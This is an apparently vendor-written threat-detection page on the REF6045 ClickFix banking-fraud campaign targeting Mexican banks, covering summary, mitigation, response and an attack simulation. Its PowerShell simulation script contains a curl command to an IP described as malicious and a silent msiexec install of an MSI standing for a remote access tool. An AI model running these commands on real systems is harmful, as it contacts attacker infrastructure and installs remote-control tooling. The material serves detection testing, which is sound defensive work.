SOC Prime Bias: High

08 Jul 2026 16:15 UTC

ClickFix to Cash-Out: Breaking Down a Mexican Banking Fraud Toolkit

Author Photo
SOC Prime Team linkedin icon Follow
ClickFix to Cash-Out: Breaking Down a Mexican Banking Fraud Toolkit
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

REF6045 is an operator-assisted banking fraud campaign focused on the Mexican financial sector. It uses a ClickFix-style delivery method with fake CAPTCHA pages to convince victims to run malicious PowerShell commands. After infection, the SCMBANKER toolkit allows human operators to observe banking sessions, capture screenshots, alter clipboard contents, and deploy Remote Utilities RAT for full remote control.

Investigation

Elastic Security Labs uncovered the threat after detecting suspicious bitsadmin activity downloading PowerShell scripts from an open directory. The investigation exposed the full toolkit through a publicly accessible web-root archive, zkt.zip, and revealed major operational security weaknesses, including unauthenticated file editors and open directories on the command-and-control infrastructure. Analysis also showed that the toolkit contains extensive AI-generated artifacts in its codebase.

Mitigation

Organizations should limit use of PowerShell and bitsadmin to approved users and enforce strict execution controls. Users should be trained to identify social engineering lures such as fake CAPTCHA prompts or fake Windows Update screens. Security teams should also deploy strong monitoring for suspicious registry changes and unauthorized installation of remote access software.

Response

If this activity is detected, isolate affected systems immediately to stop command-and-control communication and possible data theft. Conduct a forensic investigation to determine the scope of compromise and check for Remote Utilities or unauthorized registry modifications. Reset passwords for all financial and other sensitive accounts accessed from the affected machines.

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands: The adversary aims to establish a foothold on the target system by mimicking the REF6045 banking fraud pattern. First, they attempt to download a validation file from a hardcoded malicious IP address (68.211.161.46) using curl with the -k (insecure) flag to bypass SSL certificate validation. Following the download, the adversary executes a silent installation of a malicious remote access tool using msiexec.exe with the /i (install) and /quiet (silent) switches, targeting a file named hosts.msi. This provides them with persistent remote access while minimizing user interaction.

  • Regression Test Script:

    # Simulation Script for REF6045 TTPs
    # This script mimics the specific command lines defined in the detection rule.
    
    $WorkDir = "$env:TEMPSimulation"
    if (!(Test-Path $WorkDir)) { New-Item -ItemType Directory -Path $WorkDir }
    Set-Location $WorkDir
    
    Write-Host "[+] Step 1: Simulating Ingress Tool Transfer via curl..." -ForegroundColor Cyan
    # Note: Using a fake file via curl to avoid actual malicious traffic, 
    # but maintaining the exact command line string required for detection.
    cmd /c curl -k https://68.211.161.46/validation.txt
    
    Write-Host "[+] Step 2: Simulating Silent MSI Installation..." -ForegroundColor Cyan
    # Create a dummy MSI file so msiexec doesn't immediately error out (though the rule triggers on the command line)
    # For the sake of purely testing the DETECTION LOGIC (the command line), 
    # we will execute the exact command string.
    msiexec /i "hosts.msi" /quiet /norestart
  • Cleanup Commands:

    # Cleanup script to remove artifacts
    $WorkDir = "$env:TEMPSimulation"
    if (Test-Path $WorkDir) {
        Remove-Item -Recurse -Force $WorkDir
        Write-Host "[+] Cleanup complete: $WorkDir removed." -ForegroundColor Green
    } else {
        Write-Host "[!] Cleanup skipped: Directory not found." -ForegroundColor Yellow
    }